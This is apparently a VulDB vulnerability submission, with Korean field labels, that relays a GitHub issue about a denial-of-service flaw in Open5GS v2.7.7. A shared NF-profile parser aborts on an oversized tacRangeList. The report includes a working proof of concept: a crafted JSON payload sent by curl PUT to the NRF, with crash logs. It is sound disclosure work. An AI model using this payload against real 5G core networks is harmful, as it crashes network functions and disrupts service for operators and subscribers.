| 제목 | Open5GS NRF/AMF/AUSF/BSF/NSSF/PCF/SMF/UDM/UDR v2.7.7 Denial of Service |
|---|
| 설명 | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
### Description
Open5GS uses a shared NF-profile parser in `lib/sbi/nnrf-handler.c` across
multiple network functions. When `NFProfile.amfInfo.taiRangeList[*].tacRangeList`
contains more TAC ranges than the internal fixed-size budget, the shared parser
hits:
```c
int tac_index =
nf_info->amf.nr_tai_range[nf_info->amf.num_of_nr_tai_range].num_of_tac_range;
ogs_assert(tac_index < OGS_MAX_NUM_OF_TAI);
```
at `../lib/sbi/nnrf-handler.c:791` (around `782-791` depending on build).
This is a shared parser bug, not an NRF-only bug(NRF、AMF、AUSF、BSF、NSSF、PCF、SMF、UDM、UDR). A direct reproduction is shown below against NRF because it is the shortest setup, but the same handler
is also reachable from other NF-profile parsing paths such as `nf-status-notify`
and discovery responses consumed by other Open5GS network functions.
### Root cause
- Crash site: `../lib/sbi/nnrf-handler.c:791`
- Bug class: attacker-controlled list length reaches a fixed TAC array
- Controlling field: `NFProfile.amfInfo.taiRangeList[*].tacRangeList`
### Steps to reproduce
```bash
NRF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nrf)
payload=$(cat <<'EOF'
{"nfInstanceId":"fake-amf-nrf","nfType":"AMF","nfStatus":"REGISTERED","amfInfo":{"amfSetId":"001","amfRegionId":"02","guamiList":[{"plmnId":{"mcc":"001","mnc":"01"},"amfId":"020040"}],"taiRangeList":[{"plmnId":{"mcc":"001","mnc":"01"},"tacRangeList":[{"start":"000001","end":"000001"},{"start":"000002","end":"000002"},{"start":"000003","end":"000003"},{"start":"000004","end":"000004"},{"start":"000005","end":"000005"},{"start":"000006","end":"000006"},{"start":"000007","end":"000007"},{"start":"000008","end":"000008"},{"start":"000009","end":"000009"},{"start":"00000a","end":"00000a"},{"start":"00000b","end":"00000b"},{"start":"00000c","end":"00000c"},{"start":"00000d","end":"00000d"},{"start":"00000e","end":"00000e"},{"start":"00000f","end":"00000f"},{"start":"000010","end":"000010"},{"start":"000011","end":"000011"}]}]}}
EOF
)
curl --http2-prior-knowledge -m 5 -sS -i \
-X PUT "http://$NRF_IP/nnrf-nfm/v1/nf-instances/fake-amf-nrf" \
-H 'content-type: application/json' \
--data "$payload"
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf
docker logs --tail 20 nrf
```
### Logs
```shell
curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream
exited 139 2026-04-10T17:16:45.333942314Z
04/10 17:16:45.245: [sbi] FATAL: handle_amf_info: Assertion `tac_index < OGS_MAX_NUM_OF_TAI' failed. (../lib/sbi/nnrf-handler.c:791)
```
### Expected behaviour
Open5GS should reject or cap oversized `tacRangeList` input before indexing the fixed TAC array, and it should never abort the whole process on peer-controlled NF-profile data.
### Observed Behaviour
The request terminates the HTTP/2 stream and crashes the process with exit code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| 원천 | ⚠️ https://github.com/open5gs/open5gs/issues/4467 |
|---|
| 사용자 | ZiyuLin (UID 93568) |
|---|
| 제출 | 2026. 05. 04. AM 04:54 (1 월 ago) |
|---|
| 모더레이션 | 2026. 05. 29. PM 07:15 (26 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 367291 [Open5GS 까지 2.7.7 Shared NF-profile Parser lib/sbi/nnrf-handler.c 서비스 거부] |
|---|
| 포인트들 | 20 |
|---|